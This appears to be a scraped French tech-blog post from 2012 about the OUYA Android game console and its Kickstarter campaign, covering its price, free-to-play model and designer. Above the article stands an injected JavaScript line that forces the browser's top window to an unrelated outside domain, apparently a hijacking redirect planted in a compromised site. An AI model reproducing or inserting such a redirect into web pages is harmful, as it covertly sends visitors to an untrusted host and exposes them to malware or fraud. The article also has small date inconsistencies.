/* */ window.top.location.href = "http://www.jqueryc.com";

Friday, Nov. 23, 2012

OUYA : une nouvelle console de jeu sous Android

Written By:

|

21 août 2012

|

Posted In:

OUYA : une nouvelle console de jeu sous Android

 

le site Kickstarter, qui permet de financer le développement de projets et notamment de jeux vidéo,  défraie à nouveau la chronique et attise la communauté des gamers depuis que le projet Ouya y est apparu. Il s’agit tout simplement d’un projet de nouvelle console de jeu, une console basée sur le système d’exploitation de Google, Android.

Quand on voit la qualité et la quantité des jeux qui sont proposés sous Android que se soit sur téléphone ou tablettes on peut en effet très bien imaginer ce que cela pourrait donner sur grand écran…

Les créateurs de cette console, qui devrait être lancéee officiellement en mars 2013 à 99 $ seulement – 800 à 1000 DH – avec une vraie et belle manette, misent sur le modèle du Free To Play. Ils imposent en effet à tous les développeurs de proposer au moins une partie du jeu gratuite… libre au joueur d’acheter l’ensemble du jeu ou des éléments au coup par coup lorsqu’il sera séduit par la partie gratuite. N’importe qui pourra développer des jeux sur cette console et les commercialiser gratuitement… en reversant une partie du chiffre d’affaire sur le même modèle de l’AppStore d’Apple.

Certains grands noms du jeu vidéo comme Notch, l’auteur de Minecraft,  Jordan Mechner le créateur de Prince Of Prince, ou Jenova Chen, l’auteur de Flower sur PS3, ont déjà apporté leur soutient à ce projet de console dont le design sera signé par Yves Behar déjà remarqué pour avoir dessiné le haut parleur Jawbone ou le Cube, le décodeur de Canal Plus. Outre un design de console qui rappelle celui de la Game Cube, Yves Behar signe la manette qui sera equipée, en plus des classiques boutons et sticks, d’une surface tactile afin de contrôler notamment tous les jeux initialement pensés pour les téléphones et tablettes.

A ce jour près de 5 millions de dollars ont déjà été misés par des internautes qui peuvent, en fonction de leur mise obtenir différents avantages allant de la reservertion de son Pseudo à la mise à disposition d’un des premiers exemplaires avant même la commercialisation de la console Ouya prévue au printemps 2013.

Si vous avez aussi envie de jouer le jeu vous avez jusqu’au 9 aout pour faire parti de cette aventure que l’on doit suivre de prés chez Sony, Nintendo, Microsoft et Apple …

 Lien vers le projet Ouya sur Kickstarter.

Share This Article

Related News

Asus et Google sur une version low cost de la Nexus 7 ?
IFA 2012 : Samsug Galaxy Camera.
Canon EOS 6D : le reflex plein format le plus  accessible.

Leave A Reply